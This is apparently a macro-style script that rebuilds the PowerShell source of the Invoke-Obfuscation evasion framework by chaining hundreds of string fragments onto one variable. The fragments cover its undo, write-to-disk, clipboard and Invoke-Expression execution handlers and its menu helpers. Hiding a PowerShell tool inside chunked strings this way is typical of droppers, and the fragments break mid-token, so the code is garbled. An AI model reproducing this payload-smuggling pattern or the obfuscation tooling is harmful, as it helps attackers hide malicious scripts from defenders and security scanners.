Ouzw = Ouzw + "t:LauncherApplied = $FALSE
$Sc"
Ouzw = Ouzw + "ript:ObfuscatedCommand = $Script:ScriptBlock
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHistory = "
Ouzw = Ouzw + "@($Script:ScriptBlock)
$Script"
Ouzw = Ouzw + ":CliSyntax = @()
$Scri"
Ouzw = Ouzw + "pt:ExecutionCommands = @()
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully res"
Ouzw = Ouzw + "et ObfuscatedCommand." -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
}
ElseIf($Und"
Ouzw = Ouzw + "oObfuscationInputOptions[0] -Contains $UserInput)
"
Ouzw = Ouzw + " {
If(($Script:Obfuscat"
Ouzw = Ouzw + "edCommand -ne $NULL) -AND ($Script:ObfuscatedComma"
Ouzw = Ouzw + "nd.Length -eq 0))
{
"
Ouzw = Ouzw + " Write-Host "`n`nWARNING:" -NoNewLine -Foregr"
Ouzw = Ouzw + "oundColor Red
Write-Host " Obf"
Ouzw = Ouzw + "uscatedCommand has not been set. There is nothing "
Ouzw = Ouzw + "to undo."
}
ElseIf"
Ouzw = Ouzw + "($Script:ObfuscatedCommand -ceq $Script:ScriptBloc"
Ouzw = Ouzw + "k)
{
Write-Hos"
Ouzw = Ouzw + "t "`n`nWARNING:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " No obfuscation has"
Ouzw = Ouzw + " been applied to ObfuscatedCommand. There is nothi"
Ouzw = Ouzw + "ng to undo."
}
Els"
Ouzw = Ouzw + "e
{
# Set Obfu"
Ouzw = Ouzw + "scatedCommand to the last state in ObfuscatedComma"
Ouzw = Ouzw + "ndHistory.
$Script:ObfuscatedC"
Ouzw = Ouzw + "ommand = $Script:ObfuscatedCommandHistory[$Script:"
Ouzw = Ouzw + "ObfuscatedCommandHistory.Count-2]
"
Ouzw = Ouzw + " # Remove the last state from ObfuscatedComman"
Ouzw = Ouzw + "dHistory.
$Temp = $Script:Obfu"
Ouzw = Ouzw + "scatedCommandHistory
$Script:O"
Ouzw = Ouzw + "bfuscatedCommandHistory = @()
"
Ouzw = Ouzw + "For($i=0; $i -lt $Temp.Count-1; $i++)
"
Ouzw = Ouzw + " {
$Script:Obfuscat"
Ouzw = Ouzw + "edCommandHistory += $Temp[$i]
"
Ouzw = Ouzw + "}
# Remove last command from "
Ouzw = Ouzw + "CliSyntax. Trim all trailing OUT or CLIP commands "
Ouzw = Ouzw + "until an obfuscation command is removed.
"
Ouzw = Ouzw + " $CliSyntaxCount = $Script:CliSyntax.Cou"
Ouzw = Ouzw + "nt
While(($Script:CliSyntax[$C"
Ouzw = Ouzw + "liSyntaxCount-1] -Match '^(clip|out )') -AND ($Cli"
Ouzw = Ouzw + "SyntaxCount -gt 0))
{
"
Ouzw = Ouzw + " $CliSyntaxCount--
"
Ouzw = Ouzw + " }
$Temp = $Script:CliSynta"
Ouzw = Ouzw + "x
$Script:CliSyntax = @()
"
Ouzw = Ouzw + " For($i=0; $i -lt $CliSyntaxCount-1"
Ouzw = Ouzw + "; $i++)
{
"
Ouzw = Ouzw + " $Script:CliSyntax += $Temp[$i]
"
Ouzw = Ouzw + " }
# Remove last command "
Ouzw = Ouzw + "from ExecutionCommands.
$Temp "
Ouzw = Ouzw + "= $Script:ExecutionCommands
$S"
Ouzw = Ouzw + "cript:ExecutionCommands = @()
"
Ouzw = Ouzw + "For($i=0; $i -lt $Temp.Count-1; $i++)
"
Ouzw = Ouzw + " {
$Script:Executio"
Ouzw = Ouzw + "nCommands += $Temp[$i]
}
"
Ouzw = Ouzw + " # If this is removing a launcher t"
Ouzw = Ouzw + "hen we must change the launcher state so we can co"
Ouzw = Ouzw + "ntinue obfuscating.
If($Script"
Ouzw = Ouzw + ":LauncherApplied)
{
"
Ouzw = Ouzw + " $Script:LauncherApplied = $FALSE
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully "
Ouzw = Ouzw + "removed launcher from ObfuscatedCommand." -Foregro"
Ouzw = Ouzw + "undColor Cyan
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully removed last o"
Ouzw = Ouzw + "bfuscation from ObfuscatedCommand." -ForegroundCol"
Ouzw = Ouzw + "or Cyan
}
}
"
Ouzw = Ouzw + " }
ElseIf(($OutputToDiskInput"
Ouzw = Ouzw + "Options[0] -Contains $UserInput) -OR ($OutputToDis"
Ouzw = Ouzw + "kInputOptions[0] -Contains $UserInput.Trim().Split"
Ouzw = Ouzw + "(' ')[0]))
{
If(($Scri"
Ouzw = Ouzw + "pt:ObfuscatedCommand -ne '') -AND ($Script:Obfusca"
Ouzw = Ouzw + "tedCommand -ceq $Script:ScriptBlock))
"
Ouzw = Ouzw + " {
Write-Host "`n`nWARNING:"
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " You haven't applied any obfuscati"
Ouzw = Ouzw + "on.`n Just enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoNewLine -Fore"
Ouzw = Ouzw + "groundColor Yellow
Write-Host "
Ouzw = Ouzw + "" and look at ObfuscatedCommand."
"
Ouzw = Ouzw + "}
ElseIf($Script:ObfuscatedCommand"
Ouzw = Ouzw + " -ne '')
{
# G"
Ouzw = Ouzw + "et file path information from compound user input "
Ouzw = Ouzw + "(e.g. OUT C:\FILENAME.TXT).
If"
Ouzw = Ouzw + "($UserInput.Trim().Split(' ').Count -gt 1)
"
Ouzw = Ouzw + " {
# Get file "
Ouzw = Ouzw + "path information from user input.
"
Ouzw = Ouzw + " $UserInputOutputFilePath = $UserInput.Trim"
Ouzw = Ouzw + "().SubString(4).Trim()
Wri"
Ouzw = Ouzw + "te-Host ''
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # Get file path information from user interact"
Ouzw = Ouzw + "ively.
$UserInputOutputFil"
Ouzw = Ouzw + "ePath = Read-Host "`n`nEnter path for output file "
Ouzw = Ouzw + "(or leave blank for default)"
"
Ouzw = Ouzw + "}
# Deciph"
Ouzw = Ouzw + "er if user input a full file path, just a file nam"
Ouzw = Ouzw + "e or nothing (default).
If($Us"
Ouzw = Ouzw + "erInputOutputFilePath.Trim() -eq '')
"
Ouzw = Ouzw + " {
# User did not in"
Ouzw = Ouzw + "put anything so use default filename and current d"
Ouzw = Ouzw + "irectory of this script.
$"
Ouzw = Ouzw + "OutputFilePath = "$ScriptDir\Obfuscated_Command.tx"
Ouzw = Ouzw + "t"
}
ElseI"
Ouzw = Ouzw + "f(!($UserInputOutputFilePath.Contains('\')) -AND !"
Ouzw = Ouzw + "($UserInputOutputFilePath.Contains('/')))
"
Ouzw = Ouzw + " {
# User input"
Ouzw = Ouzw + " is not a file path so treat it as a filename and "
Ouzw = Ouzw + "use current directory of this script.
"
Ouzw = Ouzw + " $OutputFilePath = "$ScriptDir\$($UserI"
Ouzw = Ouzw + "nputOutputFilePath.Trim())"
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # User input is a full file p"
Ouzw = Ouzw + "ath.
$OutputFilePath = $Us"
Ouzw = Ouzw + "erInputOutputFilePath
}
"
Ouzw = Ouzw + "
# Write Obfusca"
Ouzw = Ouzw + "tedCommand out to disk.
Write-"
Ouzw = Ouzw + "Output $Script:ObfuscatedCommand > $OutputFilePath"
Ouzw = Ouzw + "
If($Script:LauncherApplied -"
Ouzw = Ouzw + "AND (Test-Path $OutputFilePath))
"
Ouzw = Ouzw + " {
$Script:CliSyntax += "
Ouzw = Ouzw + ""out $OutputFilePath"
Writ"
Ouzw = Ouzw + "e-Host "`nSuccessfully output ObfuscatedCommand to"
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host " $OutputFilePath" -NoNewLine "
Ouzw = Ouzw + "-ForegroundColor Yellow
Wr"
Ouzw = Ouzw + "ite-Host ".`nA Launcher has been applied so this s"
Ouzw = Ouzw + "cript cannot be run as a standalone .ps1 file." -F"
Ouzw = Ouzw + "oregroundColor Cyan
If($En"
Ouzw = Ouzw + "v:windir) { C:\Windows\Notepad.exe $OutputFilePath"
Ouzw = Ouzw + " }
}
ElseI"
Ouzw = Ouzw + "f(!$Script:LauncherApplied -AND (Test-Path $Output"
Ouzw = Ouzw + "FilePath))
{
"
Ouzw = Ouzw + " $Script:CliSyntax += "out $OutputFilePath"
"
Ouzw = Ouzw + " Write-Host "`nSuccessfully"
Ouzw = Ouzw + " output ObfuscatedCommand to" -NoNewLine -Foregrou"
Ouzw = Ouzw + "ndColor Cyan
Write-Host " "
Ouzw = Ouzw + "$OutputFilePath" -NoNewLine -ForegroundColor Yello"
Ouzw = Ouzw + "w
Write-Host "." -Foregrou"
Ouzw = Ouzw + "ndColor Cyan
If($Env:windi"
Ouzw = Ouzw + "r) { C:\Windows\Notepad.exe $OutputFilePath }
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
Write-Host "
Ouzw = Ouzw + ""`nERROR: Unable to write ObfuscatedCommand out to"
Ouzw = Ouzw + "" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " $OutputFilePath" -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Yellow
}
"
Ouzw = Ouzw + " }
ElseIf($Script:Obfusc"
Ouzw = Ouzw + "atedCommand -eq '')
{
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -Foregr"
Ouzw = Ouzw + "oundColor Red
Write-Host " The"
Ouzw = Ouzw + "re isn't anything to write out to disk.`n Ju"
Ouzw = Ouzw + "st enter" -NoNewLine
Write-Hos"
Ouzw = Ouzw + "t " SHOW OPTIONS" -NoNewLine -ForegroundColor Yell"
Ouzw = Ouzw + "ow
Write-Host " and look at Ob"
Ouzw = Ouzw + "fuscatedCommand."
}
}
"
Ouzw = Ouzw + " ElseIf($CopyToClipboardInputOptions[0]"
Ouzw = Ouzw + " -Contains $UserInput)
{
"
Ouzw = Ouzw + " If(($Script:ObfuscatedCommand -ne '') -AND ($Sc"
Ouzw = Ouzw + "ript:ObfuscatedCommand -ceq $Script:ScriptBlock))
"
Ouzw = Ouzw + " {
Write-Host ""
Ouzw = Ouzw + "`n`nWARNING:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " You haven't applied a"
Ouzw = Ouzw + "ny obfuscation.`n Just enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoN"
Ouzw = Ouzw + "ewLine -ForegroundColor Yellow
"
Ouzw = Ouzw + " Write-Host " and look at ObfuscatedCommand."
"
Ouzw = Ouzw + " }
ElseIf($Script:Obfus"
Ouzw = Ouzw + "catedCommand -ne '')
{
"
Ouzw = Ouzw + " # Copy ObfuscatedCommand to clipboard.
"
Ouzw = Ouzw + " # Try-Catch block introduced sin"
Ouzw = Ouzw + "ce PowerShell v2.0 without -STA defined will not b"
Ouzw = Ouzw + "e able to perform clipboard functionality.
"
Ouzw = Ouzw + " Try
{
"
Ouzw = Ouzw + " $Null = [Reflection.Assembly]::LoadWi"
Ouzw = Ouzw + "thPartialName("System.Windows.Forms")
"
Ouzw = Ouzw + " [Windows.Forms.Clipboard]::SetText($Sc"
Ouzw = Ouzw + "ript:ObfuscatedCommand)
I"
Ouzw = Ouzw + "f($Script:LauncherApplied)
"
Ouzw = Ouzw + " {
Write-Host "`n`nSuc"
Ouzw = Ouzw + "cessfully copied ObfuscatedCommand to clipboard." "
Ouzw = Ouzw + "-ForegroundColor Cyan
}
"
Ouzw = Ouzw + " Else
"
Ouzw = Ouzw + " {
Write-Host "`n`nSuc"
Ouzw = Ouzw + "cessfully copied ObfuscatedCommand to clipboard.`n"
Ouzw = Ouzw + "No Launcher has been applied, so command can only "
Ouzw = Ouzw + "be pasted into powershell.exe." -ForegroundColor C"
Ouzw = Ouzw + "yan
}
"
Ouzw = Ouzw + "}
Catch
{
"
Ouzw = Ouzw + " $ErrorMessage = "Clipboard"
Ouzw = Ouzw + " functionality will not work in PowerShell version"
Ouzw = Ouzw + " $($PsVersionTable.PsVersion.Major) unless you add"
Ouzw = Ouzw + " -STA (Single-Threaded Apartment) execution flag t"
Ouzw = Ouzw + "o powershell.exe."
If((Ge"
Ouzw = Ouzw + "t-Command Write-Host).CommandType -ne 'Cmdlet')
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " # Retrieving Write-Host and Start-Sleep Cmdlets "
Ouzw = Ouzw + "to get around the current proxy functions of Write"
Ouzw = Ouzw + "-Host and Start-Sleep that are overloaded if -Quie"
Ouzw = Ouzw + "t flag was used.
. ((G"
Ouzw = Ouzw + "et-Command Write-Host) | Where-Object {$_.Command"
Ouzw = Ouzw + "Type -eq 'Cmdlet'}) "`n`nWARNING: " -NoNewLine -Fo"
Ouzw = Ouzw + "regroundColor Red
. (("
Ouzw = Ouzw + "Get-Command Write-Host) | Where-Object {$_.Comman"
Ouzw = Ouzw + "dType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine
"
Ouzw = Ouzw + " . ((Get-Command Start-Sle"
Ouzw = Ouzw + "ep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) "
Ouzw = Ouzw + "2
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " Write-Host "`n`nWARNING: " -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Red
Wr"
Ouzw = Ouzw + "ite-Host $ErrorMessage
"
Ouzw = Ouzw + " If($Script:CliSyntax -gt 0) {Start-Sleep 2}
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + "
$Script:CliSynt"
Ouzw = Ouzw + "ax += 'clip'
}
Els"
Ouzw = Ouzw + "eIf($Script:ObfuscatedCommand -eq '')
"
Ouzw = Ouzw + " {
Write-Host "`n`nERROR:" "
Ouzw = Ouzw + "-NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " There isn't anything to copy to you"
Ouzw = Ouzw + "r clipboard.`n Just enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Yellow
Writ"
Ouzw = Ouzw + "e-Host " and look at ObfuscatedCommand." -NoNewLin"
Ouzw = Ouzw + "e
}
}"
Ouzw = Ouzw + "
ElseIf($ExecutionInputOptions[0] -Con"
Ouzw = Ouzw + "tains $UserInput)
{
If"
Ouzw = Ouzw + "($Script:LauncherApplied)
{
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Red
Write-Host"
Ouzw = Ouzw + " " Cannot execute because you have applied a Launc"
Ouzw = Ouzw + "her.`n Enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " COPY" -NoNewLine -ForeGroundColor Ye"
Ouzw = Ouzw + "llow
Write-Host "/" -NoNewLine"
Ouzw = Ouzw + "
Write-Host "CLIP" -NoNewLine "
Ouzw = Ouzw + "-ForeGroundColor Yellow
Write-"
Ouzw = Ouzw + "Host " and paste into cmd.exe.`n Or enter" -"
Ouzw = Ouzw + "NoNewLine
Write-Host " UNDO" -"
Ouzw = Ouzw + "NoNewLine -ForeGroundColor Yellow
"
Ouzw = Ouzw + " Write-Host " to remove the Launcher from Obfus"
Ouzw = Ouzw + "catedCommand."
}
E"
Ouzw = Ouzw + "lseIf($Script:ObfuscatedCommand -ne '')
"
Ouzw = Ouzw + " {
If($Script:ObfuscatedC"
Ouzw = Ouzw + "ommand -ceq $Script:ScriptBlock) {Write-Host "`n`n"
Ouzw = Ouzw + "Invoking (though you haven't obfuscated anything y"
Ouzw = Ouzw + "et):"}
Else {Write-Host "`n`nI"
Ouzw = Ouzw + "nvoking:"}
"
Ouzw = Ouzw + " Out-ScriptContents $Script:ObfuscatedCommand
"
Ouzw = Ouzw + " Write-Host ''
"
Ouzw = Ouzw + " $null = Invoke-Expression $Script:ObfuscatedComma"
Ouzw = Ouzw + "nd
}
Else {
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine -"
Ouzw = Ouzw + "ForegroundColor Red
Write-Host"
Ouzw = Ouzw + " " Cannot execute because you have not set ScriptP"
Ouzw = Ouzw + "ath or ScriptBlock.`n Enter" -NoNewline
"
Ouzw = Ouzw + " Write-Host " SHOW OPTIONS" -NoNewL"
Ouzw = Ouzw + "ine -ForegroundColor Yellow
Wr"
Ouzw = Ouzw + "ite-Host " to set ScriptPath or ScriptBlock."
"
Ouzw = Ouzw + " }
}
Else
"
Ouzw = Ouzw + " {
Write-Host "`n`nERROR:" -"
Ouzw = Ouzw + "NoNewLine -ForegroundColor Red
Wri"
Ouzw = Ouzw + "te-Host " You entered an invalid option. Enter" -N"
Ouzw = Ouzw + "oNewLine
Write-Host " HELP" -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Yellow
Write"
Ouzw = Ouzw + "-Host " for more information."
# "
Ouzw = Ouzw + "If the failed input was part of $Script:CompoundCo"
Ouzw = Ouzw + "mmand then cancel out the rest of the compound com"
Ouzw = Ouzw + "mand so it is not further processed.
"
Ouzw = Ouzw + " If($Script:CompoundCommand.Count -gt 0)
"
Ouzw = Ouzw + " {
$Script:CompoundCom"
Ouzw = Ouzw + "mand = @()
}
# Ou"
Ouzw = Ouzw + "tput all available/acceptable options for current "
Ouzw = Ouzw + "menu if invalid input was entered.
"
Ouzw = Ouzw + " If($AcceptableInput.Count -gt 1)
"
Ouzw = Ouzw + "{
$Message = 'Valid options fo"
Ouzw = Ouzw + "r current menu include:'
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " $Message = 'Valid option for current menu includ"
Ouzw = Ouzw + "es:'
}
Write-Host "
Ouzw = Ouzw + "" $Message " -NoNewLine
$Co"
Ouzw = Ouzw + "unter=0
ForEach($AcceptableOption "
Ouzw = Ouzw + "in $AcceptableInput)
{
"
Ouzw = Ouzw + " $Counter++
# Change "
Ouzw = Ouzw + "color and verbiage if acceptable options will exec"
Ouzw = Ouzw + "ute an obfuscation function.
I"
Ouzw = Ouzw + "f($SelectionContainsCommand)
{"
Ouzw = Ouzw + "
$ColorToOutput = 'Green'
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
$ColorT"
Ouzw = Ouzw + "oOutput = 'Yellow'
}
"
Ouzw = Ouzw + " Write-Host $AcceptableOption -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor $ColorToOutput
"
Ouzw = Ouzw + " If(($Counter -lt $AcceptableInput.Length) -AND"
Ouzw = Ouzw + " ($AcceptableOption.Length -gt 0))
"
Ouzw = Ouzw + " {
Write-Host ', ' -No"
Ouzw = Ouzw + "NewLine
}
}
"
Ouzw = Ouzw + " Write-Host ''
}
"
Ouzw = Ouzw + "}
}
Return $UserInput.ToLower()
}
F"
Ouzw = Ouzw + "unction Show-OptionsMenu
{
<#
.SYNOPSIS
HELPER FU"
Ouzw = Ouzw + "NCTION :: Displays options menu for Invoke-Obfusca"
Ouzw = Ouzw + "tion.
Invoke-Obfuscation Function: Show-OptionsMe"
Ouzw = Ouzw + "nu
Author: Daniel Bohannon (@danielhbohannon)
Lice"
Ouzw = Ouzw + "nse: Apache License, Version 2.0
Required Dependen"
Ouzw = Ouzw + "cies: None
Optional Dependencies: None
.DESCRIPT"
Ouzw = Ouzw + "ION
Show-OptionsMenu displays options menu for In"
Ouzw = Ouzw + "voke-Obfuscation.
.EXAMPLE
C:\PS> Show-OptionsMe"
Ouzw = Ouzw + "nu
.NOTES
This is a personal project developed b"
Ouzw = Ouzw + "y Daniel Bohannon while an employee at MANDIANT, A"
Ouzw = Ouzw + " FireEye Company.
.LINK
http://www.danielbohanno"
Ouzw = Ouzw + "n.com
#>
# Set potentially-updated script-lev"
Ouzw = Ouzw + "el values in $Script:OptionsMenu before displaying"
Ouzw = Ouzw + ".
$Counter = 0
ForEach($Line in $Script:Op"
Ouzw = Ouzw + "tionsMenu)
{
If($Line[0].ToLower().Tri"
Ouzw = Ouzw + "m() -eq 'scriptpath') {$Script:OptionsM"
Ouzw = Ouzw + "enu[$Counter][1] = $Script:ScriptPath}
If("
Ouzw = Ouzw + "$Line[0].ToLower().Trim() -eq 'scriptblock') "
Ouzw = Ouzw + " {$Script:OptionsMenu[$Counter][1] = $Script:S"
Ouzw = Ouzw + "criptBlock}
If($Line[0].ToLower().Trim() -"
Ouzw = Ouzw + "eq 'commandlinesyntax') {$Script:OptionsMenu[$"
Ouzw = Ouzw + "Counter][1] = $Script:CliSyntax}
If($Line["
Ouzw = Ouzw + "0].ToLower().Trim() -eq 'executioncommands') {"
Ouzw = Ouzw + "$Script:OptionsMenu[$Counter][1] = $Script:Executi"
Ouzw = Ouzw + "onCommands}
If($Line[0].ToLower().Trim() -"
Ouzw = Ouzw + "eq 'obfuscatedcommand')
{
# On"
Ouzw = Ouzw + "ly add obfuscatedcommand if it is different than s"
Ouzw = Ouzw + "criptblock (to avoid showing obfuscatedcommand bef"
Ouzw = Ouzw + "ore it has been obfuscated).
If($Scrip"
Ouzw = Ouzw + "t:ObfuscatedCommand -cne $Script:ScriptBlock) {$Sc"
Ouzw = Ouzw + "ript:OptionsMenu[$Counter][1] = $Script:Obfuscated"
Ouzw = Ouzw + "Command}
Else {$Script:OptionsMenu[$Co"
Ouzw = Ouzw + "unter][1] = ''}
}
If($Line[0].ToLo"
Ouzw = Ouzw + "wer().Trim() -eq 'obfuscationlength')
{
"
Ouzw = Ouzw + " # Only set/display ObfuscationLength if "
Ouzw = Ouzw + "there is an obfuscated command.
If(($S"
Ouzw = Ouzw + "cript:ObfuscatedCommand.Length -gt 0) -AND ($Scrip"
Ouzw = Ouzw + "t:ObfuscatedCommand -cne $Script:ScriptBlock)) {$S"
Ouzw = Ouzw + "cript:OptionsMenu[$Counter][1] = $Script:Obfuscate"
Ouzw = Ouzw + "dCommand.Length}
Else {$Script:Options"
Ouzw = Ouzw + "Menu[$Counter][1] = ''}
}
$Counte"
Ouzw = Ouzw + "r++
}
# Output menu.
Write-Host ""
Ouzw = Ouzw + "`n`nSHOW OPTIONS" -NoNewLine -ForegroundColor Cyan"
Ouzw = Ouzw + "
Write-Host " ::" -NoNewLine
Write-Host " "
Ouzw = Ouzw + "Yellow" -NoNewLine -ForegroundColor Yellow
Wri"
Ouzw = Ouzw + "te-Host " options can be set by entering" -NoNewLi"
Ouzw = Ouzw + "ne
Write-Host " SET OPTIONNAME VALUE" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Green
Write-Host ".`n"
"
Ouzw = Ouzw + " ForEach($Option in $Script:OptionsMenu)
{
"
Ouzw = Ouzw + " $OptionTitle = $Option[0]
$OptionValu"
Ouzw = Ouzw + "e = $Option[1]
$CanSetValue = $Option[2]
"
Ouzw = Ouzw + "
Write-Host $LineSpacing -NoNewLine
"
Ouzw = Ouzw + "
# For options that can be set by u"
Ouzw = Ouzw + "ser, output as Yellow.
If($CanSetValue) {W"
Ouzw = Ouzw + "rite-Host $OptionTitle -NoNewLine -ForegroundColor"
Ouzw = Ouzw + " Yellow}
Else {Write-Host $OptionTitle -No"
Ouzw = Ouzw + "NewLine}
Write-Host ": " -NoNewLine
"
Ouzw = Ouzw + "
# Handle coloring and multi-value outpu"
Ouzw = Ouzw + "t for ExecutionCommands and ObfuscationLength.
"
Ouzw = Ouzw + " If($OptionTitle -eq 'ObfuscationLength')
"
Ouzw = Ouzw + " {
Write-Host $OptionValue -Foregro"
Ouzw = Ouzw + "undColor Cyan
}
ElseIf($OptionTitl"
Ouzw = Ouzw + "e -eq 'ScriptBlock')
{
Out-Scr"
Ouzw = Ouzw + "iptContents $OptionValue
}
ElseIf("
Ouzw = Ouzw + "$OptionTitle -eq 'CommandLineSyntax')
{
"
Ouzw = Ouzw + " # CLISyntax output.
$SetSynt"
Ouzw = Ouzw + "ax = ''
If(($Script:ScriptPath.Length "
Ouzw = Ouzw + "-gt 0) -AND ($Script:ScriptPath -ne 'N/A'))
"
Ouzw = Ouzw + " {
$SetSyntax = " -ScriptPath"
Ouzw = Ouzw + " '$Script:ScriptPath'"
}
E"
Ouzw = Ouzw + "lseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Sc"
Ouzw = Ouzw + "ript:ScriptPath -eq 'N/A'))
{
"
Ouzw = Ouzw + " $SetSyntax = " -ScriptBlock {$Script:Scrip"
Ouzw = Ouzw + "tBlock}"
}
$CommandSyntax"
Ouzw = Ouzw + " = ''
If($OptionValue.Count -gt 0)
"
Ouzw = Ouzw + " {
$CommandSyntax = " -Com"
Ouzw = Ouzw + "mand '" + ($OptionValue -Join ',') + "' -Quiet"
"
Ouzw = Ouzw + " }
If(($SetSyntax -ne '') -O"
Ouzw = Ouzw + "R ($CommandSyntax -ne ''))
{
"
Ouzw = Ouzw + " $CliSyntaxToOutput = "Invoke-Obfuscation" +"
Ouzw = Ouzw + " $SetSyntax + $CommandSyntax
Write"
Ouzw = Ouzw + "-Host $CliSyntaxToOutput -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
Else
{
"
Ouzw = Ouzw + " Write-Host ''
}
}
"
Ouzw = Ouzw + " ElseIf($OptionTitle -eq 'ExecutionCommands')
"
Ouzw = Ouzw + " {
# ExecutionCommands output.
"
Ouzw = Ouzw + " If($OptionValue.Count -gt 0) {Write-Hos"
Ouzw = Ouzw + "t ''}
$Counter = 0
ForEach"
Ouzw = Ouzw + "($ExecutionCommand in $OptionValue)
{
"
Ouzw = Ouzw + " $Counter++
If($Exe"
Ouzw = Ouzw + "cutionCommand.Length -eq 0) {Write-Host ''; Contin"
Ouzw = Ouzw + "ue}
$ExecutionCommand"
Ouzw = Ouzw + " = $ExecutionCommand.Replace('$ScriptBlock','~').S"
Ouzw = Ouzw + "plit('~')
Write-Host " $($Execu"
Ouzw = Ouzw + "tionCommand[0])" -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host '$ScriptBlock' -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Magenta
"
Ouzw = Ouzw + " # Handle output formatting when SHOW OP"
Ouzw = Ouzw + "TIONS is run.
If(($OptionValue.Cou"
Ouzw = Ouzw + "nt -gt 0) -AND ($Counter -lt $OptionValue.Count))
"
Ouzw = Ouzw + " {
Write-Host $"
Ouzw = Ouzw + "ExecutionCommand[1] -ForegroundColor Cyan
"
Ouzw = Ouzw + " }
Else
{
"
Ouzw = Ouzw + " Write-Host $ExecutionCommand[1]"
Ouzw = Ouzw + " -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + "}
}
Write-Host ''
"
Ouzw = Ouzw + " }
ElseIf($OptionTitle -eq 'ObfuscatedComm"
Ouzw = Ouzw + "and')
{
Out-ScriptContents $Op"
Ouzw = Ouzw + "tionValue
}
Else
{
"
Ouzw = Ouzw + " Write-Host $OptionValue -ForegroundColor Mage"
Ouzw = Ouzw + "nta
}
}
}
Function Show-HelpMen"
Ouzw = Ouzw + "u
{
<#
.SYNOPSIS
HELPER FUNCTION :: Displays help"
Ouzw = Ouzw + " menu for Invoke-Obfuscation.
Invoke-Obfuscation "
Ouzw = Ouzw + "Function: Show-HelpMenu
Author: Daniel Bohannon (@"
Ouzw = Ouzw + "danielhbohannon)
License: Apache License, Version "
Ouzw = Ouzw + "2.0
Required Dependencies: None
Optional Dependenc"
Ouzw = Ouzw + "ies: None
.DESCRIPTION
Show-HelpMenu displays h"
Ouzw = Ouzw + "elp menu for Invoke-Obfuscation.
.EXAMPLE
C:\PS>"
Ouzw = Ouzw + " Show-HelpMenu
.NOTES
This is a personal project"
Ouzw = Ouzw + " developed by Daniel Bohannon while an employee at"
Ouzw = Ouzw + " MANDIANT, A FireEye Company.
.LINK
http://www.d"
Ouzw = Ouzw + "anielbohannon.com
#>
# Show Help Menu.
Wr"
Ouzw = Ouzw + "ite-Host "`n`nHELP MENU" -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host " :: Available" -NoNewLine
"
Ouzw = Ouzw + " Write-Host " options" -NoNewLine -ForegroundCo"
Ouzw = Ouzw + "lor Yellow
Write-Host " shown below:`n"
Fo"
Ouzw = Ouzw + "rEach($InputOptionsList in $AllAvailableInputOptio"
Ouzw = Ouzw + "nsLists)
{
$InputOptionsCommands = "
Ouzw = Ouzw + "$InputOptionsList[0]
$InputOptionsDescript"
Ouzw = Ouzw + "ion = $InputOptionsList[1]
# Add addition"
Ouzw = Ouzw + "al coloring to string encapsulated by <> if it exi"
Ouzw = Ouzw + "sts in $InputOptionsDescription.
If($Input"
Ouzw = Ouzw + "OptionsDescription.Contains('<') -AND $InputOption"
Ouzw = Ouzw + "sDescription.Contains('>'))
{
"
Ouzw = Ouzw + "$FirstPart = $InputOptionsDescription.SubString(0"
Ouzw = Ouzw + ",$InputOptionsDescription.IndexOf('<'))
"
Ouzw = Ouzw + " $MiddlePart = $InputOptionsDescription.SubString"
Ouzw = Ouzw + "($FirstPart.Length+1)
$MiddlePart = $M"
Ouzw = Ouzw + "iddlePart.SubString(0,$MiddlePart.IndexOf('>'))
"
Ouzw = Ouzw + " $LastPart = $InputOptionsDescription.S"
Ouzw = Ouzw + "ubString($FirstPart.Length+$MiddlePart.Length+2)
"
Ouzw = Ouzw + " Write-Host "$LineSpacing $FirstPart" -N"
Ouzw = Ouzw + "oNewLine
Write-Host $MiddlePart -NoNew"
Ouzw = Ouzw + "Line -ForegroundColor Cyan
Write-Host "
Ouzw = Ouzw + "$LastPart -NoNewLine
}
Else
"
Ouzw = Ouzw + " {
Write-Host "$LineSpacing $InputOpt"
Ouzw = Ouzw + "ionsDescription" -NoNewLine
}
"
Ouzw = Ouzw + " $Counter = 0
